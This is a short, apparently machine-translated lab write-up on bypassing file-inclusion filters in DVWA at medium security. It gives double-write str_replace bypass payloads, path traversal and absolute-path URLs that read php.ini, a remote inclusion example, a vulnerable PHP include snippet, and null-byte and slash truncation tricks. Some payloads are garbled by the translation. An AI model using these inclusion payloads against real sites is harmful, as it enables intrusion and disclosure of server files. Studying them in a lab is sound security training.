str_replace function bypass
Experimental environment DVWA, security medium
Sometimes programmers will use the str_replace function for defense, this function is extremely unsafe, because you can use double-write bypass replacement rules to easily bypass
Bypass method
For example, when page = hthttp: // tp: //192.168.0.103/phpinfo.txt, the str_replace function will delete http: //, so page = http: //192.168.0.103/phpinfo.txt, the remote command is successfully executed.
At the same time, because only "... /" and "... \" are replaced, there is no restriction on including files with an absolute path.
Three examples
1. The local file contains
http://192.168.0.103/dvwa/vulnerabilities/fi/page=…/./…/./…/./…/./…/./…/./…/./… /./…/./…/./Xampp/htdocs/dvwa/php.ini
2. Absolute path is not affected in any way
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs /dvwa/php.ini
3. The remote file contains
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p5.12.1phpphp.txt
Including truncated bypass
Defense code
<?php
if(isset($_GET['page'])){
include $_GET['page'] .".php" ;
}else{
include 'home.php';
}
?>
Determine whether the parameter is assigned, if the value is assigned, including the parameter variable, add ....... php for defense, if not copied, including home.php
This method is only suitable when magic_quotes_gpc = off, the
php version is less than 5.3. 4. It can be bypassed by% 00 truncation, but it is hard to see now, such as:
index.php?file=info.txt//////////////…………超过一定数据的/。
personal idea
Sometimes bypassing defensive means is not just about not being intercepted, but about using possible defensive means and taking others ’means as one ’s own, so that some defenses can be bypassed
